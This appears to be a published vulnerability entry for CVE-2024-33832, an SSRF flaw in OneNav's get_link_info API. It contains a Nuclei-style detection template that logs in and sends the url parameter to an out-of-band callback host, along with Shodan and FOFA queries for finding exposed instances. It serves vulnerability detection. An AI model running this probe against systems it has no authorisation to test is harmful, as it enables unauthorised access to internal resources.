漏洞描述
OneNav v0.9.35-20240318 is vulnerable to server-side request forgery (SSRF) via the url parameter in the get_link_info API. An attacker can force the server to make arbitrary requests, potentially accessing internal resources.
CVE-2024-33832: OneNav v0.9.35-20240318 - Server-Side Request Forgery (SSRF)
PoC代码[已公开]
id: CVE-2024-33832
info:
name: OneNav v0.9.35-20240318 - Server-Side Request Forgery (SSRF)
author: ritikchaddha
severity: medium
description: |
OneNav v0.9.35-20240318 is vulnerable to server-side request forgery (SSRF) via the url parameter in the get_link_info API. An attacker can force the server to make arbitrary requests, potentially accessing internal resources.
reference:
- https://github.com/Hebing123/cve/issues/39
- https://nvd.nist.gov/vuln/detail/CVE-2024-33832
classification:
epss-score: 0.03512
epss-percentile: 0.87173
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
cvss-score: 6.5
cve-id: CVE-2024-33832
cwe-id: CWE-918
metadata:
max-request: 2
product: onenav
fofa-query: icon_hash="1111283449"
shodan-query: http.favicon.hash:1111283449
tags: cve,cve2024,ssrf,onenav,oast,authenticated
http:
- raw:
- |
POST /index.php?c=login&check=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
user={{username}}&password={{password}}
- |
POST /index.php?c=api&method=get_link_info HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
url=http://{{interactsh-url}}
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- 'title":'
- 'description":'
condition: and
- type: word
part: content_type
words:
- "application/json"
# digest: 490a0046304402205da3e2ca7c4fb8d0a61d7bad53d1971fd3eb955a6007171f86c103b3be27c661022013c686c286a4826283cf53c59fbe675256fd4ed767e272f17a860b7005099f71:922c64590222798bb761d5b6d8e72950